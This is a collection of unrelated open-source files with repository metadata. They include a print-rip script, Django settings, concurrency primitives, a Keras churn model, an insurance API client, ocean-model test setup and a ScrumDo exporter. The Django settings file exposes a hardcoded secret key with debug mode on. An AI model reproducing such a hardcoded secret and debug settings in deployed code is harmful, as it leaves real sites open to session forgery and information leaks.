y = get_user_input('y: ')
# TODO map this from a .csv file or something
rip_profile = row.get('rip-profile', '')
if not rip_profile:
print('Could not determine rip profile, please enter one manually (eg shirt-white):')
rip_profile = get_user_input('rip_profile: ')
image_file = search_for_prerip_image(item_code)
if image_file:
print('Press enter to use the image {} for print code {}'.format(os.path.basename(image_file), item_code))
get_user_input()
else:
print('No image file found within {} for print code {}'.format(PRE_RIP_ORDERS_IMAGES_DIR, item_code))
while not image_file or not os.path.exists(image_file):
print('Press enter to select an image file for this rip')
get_user_input()
try:
image_file = get_user_file_pick()
except:
traceback.print_exc()
request_xml_file = os.path.join(AUTORIP_XML_IN_DIRECTORY, '{}.xml'.format(item_code))
with open(request_xml_file, 'w') as fd:
fd.write('''
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<Order>
<Id>{item_code}</Id>
<Images>
<Image>
<Id>{item_code}-i0</Id>
<SourceImage>{image_file}</SourceImage>
<RipProfile>{rip_profile}</RipProfile>
<ColorPasses>3</ColorPasses>
<Size>
<Width>{width}</Width>
<Height>{height}</Height>
</Size>
<Rotation>0</Rotation>
</Image>
</Images>
<Products>
<Product>
<Id>{item_code}-p0</Id>
<DesiredCount>1</DesiredCount>
<Material>{material}</Material>
<Prints>
<Print>
<Id>{item_code}-p0p1</Id>
<ImageId>{item_code}-i0</ImageId>
<PrintArea>front</PrintArea>
<Position>
<X>{x}</X>
<Y>{y}</Y>
</Position>
</Print>
</Prints>
</Product>
</Products>
</Order>
'''.format(
item_code=item_code,
image_file=image_file,
width=width,
height=height,
material=material,
rip_profile=rip_profile,
x=x,
y=y,
).strip())
print('Created rip request {}'.format(request_xml_file))
# Poll for 15 seconds to ensure file is accepted by auto-rip SW
print('Polling request until accepted')
accepted = False
for _ in range(0, 25 * 2):
print('.', end='', flush=True)
time.sleep(0.5)
if not os.path.exists(request_xml_file):
accepted = True
break
if accepted:
print('Auto-rip process started!')
print('Press enter to continue...')
get_user_input()
clear_screen()
except:
traceback.print_exc()
print('=' * 25)
print(' Error in spreadsheet row, please check for missing data. ')
print(' Continuing to next row in 5 seconds... ')
print('=' * 25)
time.sleep(5)
def main(args=sys.argv):
processed_at_least_one = False
for dirpath, dirnames, filenames in os.walk(PRE_RIP_ORDERS_CSV_DIR):
for file in filenames:
if file.lower().endswith('.csv'):
processed_at_least_one = True
create_order_rip_xml_request( os.path.join(dirpath, file) )
if not processed_at_least_one:
print('''
WARNING: No input .csv files found, please ensure that either:
- pre-rip .csv files have been added to {PRE_RIP_ORDERS_CSV_DIR}
or
- The PRE_RIP_ORDERS_CSV_DIR variable in {script_path}
has been updated to point to the pre-rip .csv directory.
'''.format(PRE_RIP_ORDERS_CSV_DIR=PRE_RIP_ORDERS_CSV_DIR, script_path=__file__))
print('Press enter to continue...')
get_user_input()
if __name__ == '__main__':
main()
|
[
"jeffrey.p.mcateer@gmail.com"
] |
jeffrey.p.mcateer@gmail.com
|
ed2c8ca2cc30fcb085094f35f60e5fe97a0ea5ce
|
488d58e7a0b73fa17b87d3162e389d49dd4b63c9
|
/myblog/settings.py
|
d3b457a6905cd1144e9f52cbbcab5e4113b430d1
|
[] |
no_license
|
rm4703/myblog
|
58cae8d6907fd968f0704313751bc4faa259fb06
|
7dcb402cfecd4ff447796bdcb9a0889cfedd19db
|
refs/heads/master
| 2020-04-24T06:29:03.643163
| 2019-02-21T01:22:10
| 2019-02-21T01:22:10
| 171,764,902
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,325
|
py
|
"""
Django settings for myblog project.
Generated by 'django-admin startproject' using Django 2.0.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '_fn-o_ie57nojxy+1=)*2_+iy=_cp1%g_odh!+s03)ugq0f!n7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'users.apps.UsersConfig',
'blog.apps.BlogConfig',
'django.contrib.admin',
'crispy_forms',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'myblog.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'myblog.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR,'media')
MEDIA_URL = '/media/'
CRISPY_TEMPLATE_PACK = 'bootstrap4'
LOGIN_REDIRECT_URL = 'blog-home'
LOGIN_URL = 'login'
|
[
"r.m.d.karunarathna@gmail.com"
] |
r.m.d.karunarathna@gmail.com
|
76bb9e0cafe73ba95cf62ab87ccc7cef03942f0d
|
556423abe075b21a03f6fdbaea2a6acd44a46a00
|
/tapystry/concurrency.py
|
6e9576e580a2536189c3d52cdc0e7069a58a7437
|
[
"MIT"
] |
permissive
|
daniel-ziegler/tapystry
|
ebb43be58c2b733e0b4f8f395879d6b09bbff151
|
927d51be776103d7cbfa29a02ce93c0bc5747d12
|
refs/heads/master
| 2022-11-20T19:27:39.023537
| 2020-07-20T18:30:50
| 2020-07-20T18:30:50
| 281,474,463
| 0
| 0
|
MIT
| 2020-07-21T18:29:35
| 2020-07-21T18:29:34
| null |
UTF-8
|
Python
| false
| false
| 3,614
|
py
|
from uuid import uuid4
from collections import deque
from tapystry import Call, Broadcast, Receive, TapystryError, as_effect
"""
TODO: have something like a Promise?
def doStuffWithPromise(p):
...
yield p.Resolve(val)
p = Promise()
yield Fork(doStuffWithPromise, (p,))
yield p
reem suggests just running an asyncio event loop to schedule ascynio futures
"""
class Lock():
"""
Like a traditional lock
Usage:
l = Lock()
release = yield l.Acquire()
...
yield release
"""
def __init__(self, name=None):
self._id = uuid4()
self._q = deque()
self.name = name or ""
self._counter = 0
@as_effect()
def Acquire(self):
acquire_id = self._counter
self._counter += 1
def remove():
self._q.remove(acquire_id)
@Call
def Release():
if not len(self._q) or acquire_id != self._q.popleft():
raise TapystryError(f"Yielded same lock release multiple times? {self.name}")
if len(self._q):
# use immediate=True to make sure receiving thread doesn't get canceled before the receive happens
yield Broadcast(f"lock.{self._id}.{self._q[0]}", immediate=True)
if len(self._q) > 0:
self._q.append(acquire_id)
yield Receive(f"lock.{self._id}.{acquire_id}", oncancel=remove)
else:
self._q.append(acquire_id)
return Release
class Queue():
"""
A queue of items.
Each item can only be taken once.
A buffer_size value of -1 indicates no limit
"""
def __init__(self, name=None, buffer_size=0):
self._id = uuid4()
self._buffer_size = buffer_size
self.name = name or ""
self._buffer = deque()
# queue of gets (if queue is empty)
self._gets = deque()
# queue of puts (if queue is full)
self._puts = deque()
self._put_vals = dict()
self._counter = 0
@as_effect()
def Put(self, item):
put_id = self._counter
self._counter += 1
def remove():
self._puts.remove(put_id)
self._put_vals.pop(put_id)
if len(self._gets):
assert not len(self._puts)
get_id = self._gets.popleft()
yield Broadcast(f"put.{self._id}.{get_id}", item, immediate=True)
else:
if self._buffer_size >= 0 and len(self._buffer) >= self._buffer_size:
assert len(self._buffer) == self._buffer_size
self._puts.append(put_id)
self._put_vals[put_id] = item
yield Receive(f"get.{self._id}.{put_id}", oncancel=remove)
else:
self._buffer.append(item)
@as_effect()
def Get(self):
get_id = self._counter
self._counter += 1
def remove():
self._gets.remove(get_id)
if len(self._buffer):
item = self._buffer.popleft()
if len(self._puts):
put_id = self._puts.popleft()
self._buffer.append(self._put_vals.pop(put_id))
yield Broadcast(f"get.{self._id}.{put_id}", immediate=True)
elif len(self._puts):
assert self._buffer_size == 0
put_id = self._puts.popleft()
item = self._put_vals.pop(put_id)
yield Broadcast(f"get.{self._id}.{put_id}", immediate=True)
else:
self._gets.append(get_id)
item = yield Receive(f"put.{self._id}.{get_id}", oncancel=remove)
return item
|
[
"wuthefwasthat@gmail.com"
] |
wuthefwasthat@gmail.com
|
10e3051c6277a5bc0cdf2a0185509e35acb29bc2
|
1b94f9b96fd986a47bab1a839bb13045dfef61e4
|
/tests/read_write_json_test.py
|
19fa326989368ef4a7dc2c8619aede7880e2bb9b
|
[
"MIT"
] |
permissive
|
Amine-HADJEMI/python-code-katas
|
565052c9413ff21afb1a57923461bff8acd91a15
|
496d9224bbef3ee83a0e94f3a27b8e03159f84c5
|
refs/heads/master
| 2023-03-18T20:30:20.465499
| 2020-11-10T07:11:44
| 2020-11-10T07:11:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 521
|
py
|
from src.katas.read_write_json import write_to_json_file, read_from_json_file
import unittest
class ReadWriteJsonTest(unittest.TestCase):
_data = {
"president": {
"name": "Zaphod Beeblebrox",
"species": "Betelgeusian"
}
}
def test_can_write_given_data_to_json_file_in_proper_json_format(self):
json_file = 'tests/fixtures/data_file.json'
write_to_json_file(self._data, json_file)
self.assertEqual(self._data, read_from_json_file(json_file))
|
[
"tjthavarshan@gmail.com"
] |
tjthavarshan@gmail.com
|
ed9eb94b204c2ea8d226b54c922d1098dc84d7f6
|
c0a10e255a0eccbda95427d3c32208298bf95f68
|
/build_ann_improve.py
|
7a7357ca9cd0240818bda78b8dc677b7c4421338
|
[] |
no_license
|
jrachid/ArtificialNeuronNetwork
|
93093c3ef0407831459a4badac45963bc03308f7
|
4a78359a0e120580e95f6bfd4e2db212c5e9efa8
|
refs/heads/master
| 2020-04-17T11:24:03.437282
| 2019-01-19T11:27:01
| 2019-01-19T11:27:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,433
|
py
|
'''
Une banque remarque que, récemment, beaucoup de ses clients quittent la banque
Celle-ci vous recrute afin de comprendre ce qui se passe et pourquoi?
La banque a sélectionné un sous ensemble de ces clients
cet échantillon représente 10,000 clients
customerID|Surname|CreditScore|Geography|Gender|Age|Tenure|Balance|NumOfProducts|HasCrCard|
isActiveMember|EstimatedSalary|Exited
CreditScore : donne la capacité de remboursement d'un client
Tenure : Nombre d'aannées où la personne est client de la banque
Exited : si le client a quitté la banque ou non, observations faites sur 6 mois (1: a quitté la banque)
Il va falloir trouver le segment de client qui a le plus tendance à quitter la banque
Quand la banque aura repéré ce segment, elle pourra les contacter et adapter son offre à ces clients lÃ
C'est donc un problème de classification
'''
### Data Preprocessing ###
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Churn_Modelling.csv')
X = dataset.iloc[:, 3:13].values
y = dataset.iloc[:, -1].values
# Encoding categorical data - independent variable
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
labelencoder_x1 = LabelEncoder()
X[:,1] = labelencoder_x1.fit_transform(X[:,1])
labelencoder_x2 = LabelEncoder()
X[:,2] = labelencoder_x2.fit_transform(X[:,2])
# Création des colonnes France/Spain/Germany
onehotencoder = OneHotEncoder(categorical_features = [1])
X = onehotencoder.fit_transform(X).toarray()
# Dummy variable
X = X[:,1:]
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
### Build ANN ###
# Importing Keras modules
import keras
# Module for initialization of the ANN
from keras.models import Sequential
# Module for creating layers inside the ANN
from keras.layers import Dense, Dropout
# Initialization of the ANN
classifier = Sequential()
# Add enter layer and hidden layer
# Utilisation de la fonction redresseur dans le réseau et la fonction sigmoid pour la sortie
classifier.add(Dense(units = 6, activation = "relu", kernel_initializer = "uniform", input_dim=11))
# utilisation de la classe Dropout pour réduire l'overfitting
classifier.add(Dropout(rate=0.1))
# Add a second hidden layer
classifier.add(Dense(units = 6, activation = "relu", kernel_initializer = "uniform"))
classifier.add(Dropout(rate=0.1))
# Add the output layer ( with probability)
classifier.add(Dense(units = 1, activation = "sigmoid", kernel_initializer = "uniform"))
# compiler the ANN (with Stochastic Gradient Descent)
classifier.compile(optimizer = "adam", loss="binary_crossentropy", metrics=["accuracy"])
# Train the ANN
classifier.fit(X_train, y_train, batch_size = 10, epochs=100)
# Predicting the Test set results
y_pred = classifier.predict(X_test)
#♣ transform y_pred to boolean
y_pred = (y_pred > 0.5)
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
# Make a prediction
classifier.predict(sc.transform(np.array([[0.0,0,600,1,40,3,60000,2,1,1,50000]]))) > 0.5
|
[
"rachidj@protonmail.ch"
] |
rachidj@protonmail.ch
|
83c80056c6cc34b59806b887e9533647b054c969
|
b3c856026a28c766755d7a94e04c1d46a57d3769
|
/language/nodes/Pattern.py
|
4a58954d9555bdb1becb4d391d3797502dfb144e
|
[] |
no_license
|
nipster94/humanoid-robotics
|
b72d3409b1b9fa83521a7330a0985b5ad5786b72
|
64c3852184d1e632403cf2a05906e56c81f28e08
|
refs/heads/master
| 2023-04-14T01:38:29.554381
| 2021-04-28T17:11:46
| 2021-04-28T17:11:46
| 211,831,854
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 170
|
py
|
class Pattern:
def __init__(self, string):
self.string = string
def getString(self):
return self.string
def setString(self, string):
self.string = string
|
[
"mailtonipun94@gmail.com"
] |
mailtonipun94@gmail.com
|
51c4faecec1d981801b414bef09674ab7bb6981e
|
7e9d0982969c4875d58b527c72455da93ad8d0aa
|
/pioneer/client.py
|
2d3f97647603c36b617610ac94158ad943b77d5d
|
[] |
no_license
|
vbanasihan/sample_code
|
bc6aeb5b69850cb8669adfb2f86d861daf35ea2a
|
cebfd605a3c8e790d0a8e9360524d0bdaed2f408
|
refs/heads/master
| 2023-02-09T06:31:45.590297
| 2020-12-31T23:18:25
| 2020-12-31T23:49:31
| 325,887,289
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,067
|
py
|
from django.conf import settings
from maria.client import HTTPAPIClient
class PioneerClient(HTTPAPIClient):
BASE_URL = settings.PIONEER_URL_PROD if settings.PIONEER_PROD else settings.PIONEER_URL_STAGING
PRODUCT_TYPE_MEDICASH_DENGUE = 'MD'
PRODUCT_TYPE_LEPTOSPIROSIS = 'ML'
GENDER_MALE = 'M'
GENDER_FEMALE = 'F'
CIVIL_STATUS_SINGLE = 'S'
CIVIL_STATUS_MARRIED = 'M'
def __init__(self, username, password, api_key):
super(PioneerClient, self).__init__(base_url=self.BASE_URL)
self.login(username, password, api_key)
def build_url(self, path):
url = '{}{}?api_key={}'.format(
self.base_url.format(
self.username,
self.password
),
path,
self.api_key
)
print(url)
return url
def get_auth(self):
return (self.username, self.password)
def login(self, username, password, api_key):
self.username = username
self.password = password
self.api_key = api_key
def order(
self,
issuance_source,
branch_of_purchase,
product_type,
email,
firstname,
middlename,
lastname,
gender,
mobileno,
bdate,
civ_stat,
province,
city,
zipcode,
street_brgy,
insured_email,
insured_firstname,
insured_middlename,
insured_lastname,
insured_gender,
insured_mobileno,
insured_bdate,
insured_civ_stat,
insured_province,
insured_city,
insured_zipcode,
insured_street_brgy,
cc_email,
bcc_email,
): # spelling these all out for explicitness (instead of using kwargs)
r = self.post('/register_medicash', json={
'issuance_source': issuance_source,
'branch_of_purchase': branch_of_purchase,
'product_type': product_type,
'email': email,
'firstname': firstname,
'middlename': middlename,
'lastname': lastname,
'gender': gender,
'mobileno': mobileno,
'bdate': bdate,
'civ_stat': civ_stat,
'province': province,
'city': city,
'zipcode': zipcode,
'street_brgy': street_brgy,
'insured_email': insured_email,
'insured_firstname': insured_firstname,
'insured_middlename': insured_middlename,
'insured_lastname': insured_lastname,
'insured_gender': insured_gender,
'insured_mobileno': insured_mobileno,
'insured_bdate': insured_bdate,
'insured_civ_stat': insured_civ_stat,
'insured_province': insured_province,
'insured_city': insured_city,
'insured_zipcode': insured_zipcode,
'insured_street_brgy': insured_street_brgy,
'cc_email': cc_email,
'bcc_email': bcc_email,
})
return(r)
|
[
"silvenepistola@gmail.com"
] |
silvenepistola@gmail.com
|
51a155118d26cb9fbbbe172f223b46f6532c9ecb
|
ac517b0cf71b2b501b184d3f10347294232c179a
|
/ocean_tasks.py
|
36f6a04579c7fe6706b74603e46abaff558d4db7
|
[] |
no_license
|
douglasjacobsen/mpas-lettuce-ocean
|
6135b48cc168bae34ca1b828330b91765efed8bc
|
63dd5dc12e92667c7636ca7b8a5f37aea705e5bb
|
refs/heads/master
| 2016-09-15T22:32:23.590598
| 2015-02-18T17:51:05
| 2015-02-18T17:51:05
| 14,343,146
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,836
|
py
|
import sys, os, glob, shutil, numpy, math
import subprocess
from netCDF4 import *
from netCDF4 import Dataset as NetCDFFile
from pylab import *
from lettuce import *
from collections import defaultdict
import xml.etree.ElementTree as ET
dev_null = open(os.devnull, 'w')
def seconds_to_timestamp(seconds):#{{{
days = 0
hours = 0
minutes = 0
if seconds >= 24*3600:
days = int(seconds/(24*3600))
seconds = seconds - int(days * 24 * 3600)
if seconds >= 3600:
hours = int(seconds/3600)
seconds = seconds - int(hours*3600)
if seconds >= 60:
minutes = int(seconds/60)
seconds = seconds - int(minutes*60)
timestamp = "%4.4d_%2.2d:%2.2d:%2.2d"%(days, hours, minutes, seconds)
return timestamp
#}}}
def timestamp_to_seconds(timestamp):#{{{
in_str = timestamp.translate(None, "'")
days = 0
hours = 0
minutes = 0
seconds = 0
if timestamp.find("_") > 0:
parts = in_str.split("_")
ymd = parts[0]
tod = parts[1]
if ymd.find("-") == 0:
days = days + float(ymd)
elif ymd.find("-") == 1:
parts = ymd.split("-")
days = days + 30 * float(parts[0])
days = days + float(parts[1])
elif ymd.find("-") == 2:
parts = ymd.split("-")
days = days + 365 * float(parts[0])
days = days + 30 * float(parts[1])
days = days + float(parts[2])
else:
tod = in_str
if tod.find(":") == 0:
seconds = float(tod)
elif tod.find(":") == 1:
parts = tod.split(":")
minutes = float(parts[0])
seconds = float(parts[1])
elif tod.find(":") == 2:
parts = tod.split(":")
hours = float(parts[0])
minutes = float(parts[1])
seconds = float(parts[2])
seconds = seconds + minutes * 60 + hours * 3600 + days * 24 * 3600
return seconds
#}}}
@step('A "([^"]*)" "([^"]*)" "([^"]*)" "([^"]*)" test')#{{{
def get_test_case(step, size, levs, test, time_stepper):
for testtype in ('trusted', 'testing'):
world.base_dir = os.getcwd()
world.test = "%s_%s_%s"%(test, size, levs)
world.num_runs = 0
world.namelist = "namelist.ocean_forward"
world.streams = "streams.ocean_forward"
#Setup trusted...
if not os.path.exists("%s/%s_tests"%(world.base_dir, testtype)):
command = "mkdir"
arg1 = "-p"
arg2 = "%s/%s_tests"%(world.base_dir, testtype)
subprocess.call([command, arg1, arg2], stdout=dev_null, stderr=dev_null)
os.chdir("%s/%s_tests"%(world.base_dir, testtype))
if world.clone:
if not os.path.exists("%s/%s_tests/%s.tgz"%(world.base_dir, testtype, world.test)):
command = "wget"
arg1 = "%s/%s.tgz"%(world.trusted_url, world.test)
subprocess.call([command, arg1], stdout=dev_null, stderr=dev_null)
if not os.path.exists("%s/%s_tests/%s"%(world.base_dir, testtype, world.test)):
command = "tar"
arg1 = "xzf"
arg2 = "%s.tgz"%world.test
subprocess.call([command, arg1, arg2], stdout=dev_null, stderr=dev_null)
command = "cp"
arg1 = "%s/namelist.ocean_forward"%world.test
arg2 = "%s/namelist.ocean_forward.default"%world.test
subprocess.call([command, arg1, arg2], stdout=dev_null, stderr=dev_null)
command = "cp"
arg1 = "%s/streams.ocean_forward.xml"%world.test
arg2 = "%s/streams.ocean_forward.default.xml"%world.test
subprocess.call([command, arg1, arg2], stdout=dev_null, stderr=dev_null)
os.chdir("%s/%s_tests/%s"%(world.base_dir, testtype, world.test))
for exetype in ('trusted', 'testing'):
command = "ln"
arg1 = "-s"
arg2 = "%s/%s/ocean_forward_model"%(world.base_dir, exetype)
arg3 = "ocean_model_%s"%(exetype)
subprocess.call([command, arg1, arg2, arg3], stdout=dev_null, stderr=dev_null)
command = "cp"
arg1 = "namelist.ocean_forward.default"
arg2 = "namelist.ocean_forward"
subprocess.call([command, arg1, arg2], stdout=dev_null, stderr=dev_null)
command = "cp"
arg1 = "streams.ocean_forward.default"
arg2 = "streams.ocean_forward"
subprocess.call([command, arg1, arg2], stdout=dev_null, stderr=dev_null)
command = "rm"
arg1 = "-f"
arg2 = '\*.output.nc'
subprocess.call([command, arg1, arg2], stdout=dev_null, stderr=dev_null)
# {{{ Setup namelist file
namelistfile = open(world.namelist, 'r+')
lines = namelistfile.readlines()
for line in lines:
if line.find("config_dt") >= 0:
line_split = line.split(" = ")
world.dt = line_split[1]
world.dt_sec = timestamp_to_seconds(line_split[1])
if line.find("config_time_integrator") >= 0:
line_split = line.split(" = ")
world.old_time_stepper = line_split[1].replace("'","")
world.time_stepper_change = False
if world.old_time_stepper.find(time_stepper) < 0:
world.time_stepper_change = True
if world.old_time_stepper.find("split_explicit") >= 0:
world.dt_sec /= 10.0
elif time_stepper.find("split_explicit") >= 0:
world.dt_sec *= 10.0
duration = seconds_to_timestamp(int(world.dt_sec*2))
namelistfile.seek(0)
namelistfile.truncate()
for line in lines:
new_line = line
if line.find("config_run_duration") >= 0:
new_line = " config_run_duration = '%s'\n"%(duration)
elif line.find("config_output_interval") >= 0:
new_line = " config_output_interval = '0000_00:00:01'\n"
elif line.find("config_restart_interval") >= 0:
new_line = " config_restart_interval = '1000_00:00:01'\n"
elif line.find("config_stats_interval") >= 0:
new_line = " config_stats_interval = '1000_00:00:01'\n"
elif line.find("config_dt") >= 0:
new_line = " config_dt = '%s'\n"%(seconds_to_timestamp(world.dt_sec))
elif line.find("config_frames_per_outfile") >= 0:
new_line = " config_frames_per_outfile = 0\n"
elif line.find("config_write_output_on_startup") >= 0:
new_line = " config_write_output_on_startup = .true.\n"
elif world.time_stepper_change:
if line.find("config_time_integrator") >= 0:
new_line = " config_time_integrator = '%s'\n"%(time_stepper)
namelistfile.write(new_line)
namelistfile.close()
del lines
#}}}
#{{{ Setup streams file
tree = ET.parse(world.streams)
root = tree.getroot()
# Remove all streams (leave the immutable streams)
for stream in root.findall('stream'):
root.remove(stream)
# Create an output stream
output = ET.SubElement(root, 'stream')
output.set('name', 'output')
output.set('type', 'output')
output.set('filename_template', 'output.nc')
output.set('filename_interval', 'none')
output.set('output_interval', '01')
# Add tracers to output stream
member = ET.SubElement(output, 'var_array')
member.set('name', 'tracers')
# Add layerThickness to output stream
member = ET.SubElement(output, 'var')
member.set('name', 'layerThickness')
# Add normalVelocity to output stream
member = ET.SubElement(output, 'var')
member.set('name', 'normalVelocity')
tree.write(world.streams)
del tree
del root
del output
del member
#}}}
os.chdir(world.base_dir)
#}}}
|
[
"jacobsen.douglas@gmail.com"
] |
jacobsen.douglas@gmail.com
|
522cb82226b84c23e82b5bac48da2df2b3f8d690
|
d727adfa5c469625182e18448e297786988e953b
|
/examples/python/export_attachments_comments.py
|
180997d51f20f4d6a357ddfa28f457556b21c10c
|
[
"MIT"
] |
permissive
|
swaticode/ScrumDoAPIv3
|
17958f8f7350bc9e5e0b3f6d0eba46f794f06be3
|
042a21d259029123f1ca1ab27fcd9360281787af
|
refs/heads/master
| 2021-01-23T17:42:17.404561
| 2017-04-27T00:54:03
| 2017-04-27T00:54:03
| 102,773,266
| 0
| 0
| null | 2017-09-07T18:43:04
| 2017-09-07T18:43:03
| null |
UTF-8
|
Python
| false
| false
| 3,388
|
py
|
import slumber
from colorama import init, Fore, Back, Style
from time import sleep
import urllib2
import local_settings as settings
import json
import os
# We're using slumber (http://slumber.in/), a python library that makes RESTfull calls amazingly easy, to access the API
def main():
init()
base_url = "%s/api/v3/" % settings.scrumdo_host
api = slumber.API(base_url, auth=(settings.scrumdo_username, settings.scrumdo_password))
for project in api.organizations(settings.organization_slug).projects.get():
exportProject(project, api)
def exportProject(project, api):
print "Exporting project {slug}".format(slug=project['slug'])
ensure_dir('output/{slug}'.format(slug=project['slug']) )
filename = 'output/{slug}/project.json'.format(slug=project['slug'])
with open(filename, 'w') as output:
output.write( json.dumps(project, indent=2) )
epics = api.organizations(settings.organization_slug).projects.epics.get()
filename = 'output/{slug}/epics.json'.format(slug=project['slug'])
with open(filename, 'w') as output:
output.write(json.dumps(epics, indent=2))
for iteration in api.organizations(settings.organization_slug).projects(project['slug']).iterations.get():
exportIteration(project, iteration, api)
def exportIteration(project, iteration, api):
print " Exporting iteration {id}".format(id=iteration['id'])
ensure_dir('output/{slug}/{id}'.format(slug=project['slug'], id=iteration['id']) )
filename = 'output/{slug}/{id}/iteration.json'.format(slug=project['slug'], id=iteration['id'])
with open(filename, 'w') as output:
output.write( json.dumps(iteration, indent=2) )
for story in api.organizations(settings.organization_slug).projects(project['slug']).iterations(iteration['id']).stories.get():
exportStory(project, iteration, story, api)
def exportStory(project, iteration, story, api):
comments = api.comments.story(story['id']).get()
ensure_dir('output/{slug}/{id}/{number}'.format(slug=project['slug'], id=iteration['id'], number=story['number']))
filename = 'output/{slug}/{id}/{number}/card.json'.format(slug=project['slug'], id=iteration['id'], number=story['number'])
with open(filename, 'w') as output:
output.write( json.dumps(story, indent=2) )
if len(comments) > 0:
filename = 'output/{slug}/{id}/{number}/comments.json'.format(slug=project['slug'], id=iteration['id'], number=story['number'])
with open(filename, 'w') as output:
output.write( json.dumps(comments, indent=2) )
attachments = api.organizations(settings.organization_slug).projects(project['slug']).stories(story['id']).attachments.get()
for attachment in attachments:
df = urllib2.urlopen(attachment['url'])
filename = u"output/{slug}/{id}/{number}/{filename}".format(slug=project['slug'], id=iteration['id'], number=story['number'], filename=attachment['filename'])
output = open(filename,'wb')
output.write(df.read())
output.close()
print filename
def ensure_dir(f):
if not os.path.exists(f):
os.makedirs(f)
# Since we're iterating over your entire account in this example, there could be a lot of API calls.
# This function is a dumb way to make sure we don't go over the throttle limit.
def check_throttle(requests):
requests += 1
if requests >= 49:
sleep(5) # Add in a delay when we get close the our max # of requests per 5 seconds.
return 0
return requests
if __name__ == "__main__":
main()
|
[
"marc.hughes@gmail.com"
] |
marc.hughes@gmail.com
|
c41c591c5cd9229e940f202ae5d2a67c35aa77b3
|
ee0902f2b930eeb9ae626f4a325a62bcd505a108
|
/app/consoles.py
|
60e3074ccf9814bf8333913fc16a02b8fce2286c
|
[] |
no_license
|
EvanDorsky/wh2music
|
052f1e809cb96f8c154edc92763514a7c0390ed2
|
6df422a48dd03390383ab46c87c93229f082f4d4
|
refs/heads/master
| 2021-01-18T07:48:37.425963
| 2013-06-26T01:07:57
| 2013-06-26T01:07:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,118
|
py
|
#For shits and giggles, for those times I type console.log
from __future__ import print_function
import sys
import inspect
class Console(object):
def __init__(self, log=None):
__old_excepthook = sys.excepthook
self.__log__ = []
def console_excepthook(*args):
if log:
log.write(self.format(self.__log__))
__old_excepthook(*args)
sys.excepthook = console_excepthook
def log(self, *args):
filename = inspect.getframeinfo(inspect.stack()[1][0]).filename
line = inspect.stack()[1][2]
self.__log__.append((filename, line, args))
print(self.format_line(self.__log__[-1]))
return '' #So templates don't print it
def format(self, log):
string = ''
for line in log:
string.append(format_line(line) + '\n')
return string
def format_line(self, logdata):
prefix = '%s (%d):' %(logdata[0],logdata[1])
return prefix + ' ' + ' '.join(logdata[2])
def __str__(self):
return '<Console object with %d logs>' %len(self.__log__)
|
[
"allevitan@gmail.com"
] |
allevitan@gmail.com
|
9ed54c4533ed3732ca4a892e7612914bbe44c2c4
|
d0f5fc44cd928fe575774403dcf05cb3a2f52dba
|
/src/appier/test/__init__.py
|
5b2204c86fab7233c0af77351c4f8902bb4466ce
|
[
"Apache-2.0"
] |
permissive
|
gcandal/appier
|
8f7a7088da56637e0ff079b395b1af863a77d4ca
|
00a8bd952fda2392184308e324bd97ba4bb18f3c
|
refs/heads/master
| 2021-07-16T02:28:25.894889
